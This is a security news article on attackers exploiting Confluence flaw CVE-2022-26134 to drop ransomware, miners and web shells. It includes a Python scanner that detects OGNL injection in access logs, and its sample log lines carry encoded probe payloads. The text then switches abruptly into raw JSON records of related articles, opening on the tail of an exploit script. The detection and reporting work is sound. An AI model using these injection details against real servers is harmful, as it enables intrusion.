A recently patched [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.
In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.
The bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way for remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.
Other notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.
"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage," Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).
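Because the shell Brandt describes lives in memory and writes nothing to disk, the web server's access log is often the only record of an exploitation attempt. The following scanner is an added example (not code from the article, Sophos, or Atlassian): it flags requests whose URI path contains an OGNL expression marker (`${`), including when it is percent-encoded or double-encoded, which is how CVE-2022-26134 is triggered. The Tomcat "common" log format and the sample lines are assumed and constructed for this example.

```python
"""Scan Confluence/Tomcat access-log lines for CVE-2022-26134-style
OGNL injection attempts, i.e. an OGNL expression such as ${...} placed
in the URI path. Log format and sample lines are assumptions made for
this example, not artifacts from a real incident."""
import re
from urllib.parse import unquote

# Constructed sample log in Tomcat "common" format (%h %l %u %t "%r" %s %b).
# Addresses and paths are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jun/2022:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 5120
10.0.0.9 - - [03/Jun/2022:10:02:15 +0000] "POST /%24%7B%28%23a%3D1%29%7D/ HTTP/1.1" 302 0
10.0.0.9 - - [03/Jun/2022:10:02:16 +0000] "GET /%2524%257B1%257D/dashboard.action HTTP/1.1" 302 0
10.0.0.7 - - [03/Jun/2022:10:03:40 +0000] "GET /display/DOC/Home?q=%24%7Bx%7D HTTP/1.1" 200 8801
"""

# One access-log line: client ip, ident, user, [timestamp], "METHOD target PROTO", status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

OGNL_MARKER = "${"


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding. Attackers double-encode '${'
    as '%2524%257B' to slip past naive single-decode filters, so keep
    decoding until the string stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_ognl_path(target: str) -> bool:
    """True if the URI *path* (query string excluded) contains an OGNL
    expression marker after decoding. CVE-2022-26134 is reached through
    the path segment, which is why the query string is not inspected."""
    path = target.split("?", 1)[0]
    return OGNL_MARKER in fully_decode(path)


def scan_log(text: str) -> list:
    """Return one finding per log line whose request path carries an
    OGNL marker. Each finding records the client, timestamp, status and
    the decoded path so an analyst can read the injected expression."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        if is_ognl_path(m["target"]):
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "decoded_path": fully_decode(m["target"].split("?", 1)[0]),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} path={f['decoded_path']}")
```

A 302 on a request whose path is an OGNL expression is the pattern to look for first; benign Confluence paths never start with `${`.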
The disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that "multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134."
DEV-0401, described by Microsoft as a "China-based lone wolf turned LockBit 2.0 affiliate," has also been previously linked to ransomware deployments targeting internet-facing systems running VMware Horizon ([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers ([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).
The development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.
soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] \nprint(queryStringValue) \n \n \nbanner() \ncmdExec() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164013/confluenceserver7124-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-06-03T09:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. 
Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical 
security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. 
\"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": "THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-25T03:59:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg>)\n\nThe **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by 
their internet accessibility,\" Hegel pointed out.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e100/malware.jpg>)\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, not to mention underscore a heightened \"battle\" to take control of victim systems from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:15", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD>)\n\nOpportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian 
Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.\n\nTracked as **CVE-2021-26084** (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\n\"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server,\" researchers from Trend Micro [noted](<https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug>) in a technical write-up detailing the weakness. \"Successful exploitation can result in arbitrary code execution in the security context of the affected server.\"\n\nThe vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.\n\nThe in-the-wild attacks come after the U.S. 
Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of mass exploitation attempts following the vulnerability's public disclosure in late August this year.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye>)\n\nIn [one such attack](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. Imperva, in an independent analysis, [corroborated the findings](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>), uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.\n\nAlso detected by Imperva, [Juniper](<https://blogs.juniper.net/en-us/threat-research/muhstik-botnet-targeting-confluence-servers-with-cve-2021-26084>), and [Lacework](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>) is exploitation activity conducted by Muhstik, a China-linked [botnet](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) known for its [wormlike self-propagating capability](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) to infect Linux servers and IoT devices since at least 
2018.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT>)\n\nFurthermore, Palo Alto Networks' Unit 42 threat intelligence team said it [identified and prevented attacks](<https://www.paloaltonetworks.com/blog/security-operations/cve-2021-26084-linux-exploitation-in-the-wild/>) that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.\n\n\"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain,\" Imperva researchers said. \"RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\"\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T15:31:00", "type": "thn", "title": "Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-29T03:33:58", "id": "THN:5763EE4C0049A18C83419B000AAB347A", "href": "https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. 
Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. 
It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. 
Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. 
Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-ECBRNAQfxt4/YTc5IJ3yF6I/AAAAAAAADvk/AKO-gQEBwOICCTQJArFbT7OQXrde61d-wCLcBGAsYHQ/s0/jenkin.jpg>)\n\nThe maintainers of Jenkins\u2014a popular open-source automation server software\u2014have disclosed a security breach after unidentified threat actors gained access to one of their servers by exploiting a recently disclosed vulnerability in Atlassian Confluence service to install a cryptocurrency miner.\n\nThe \"successful attack,\" which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.\n\n\"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected,\" the company [said](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) in a statement published over the weekend.\n\nThe disclosure comes as the U.S. 
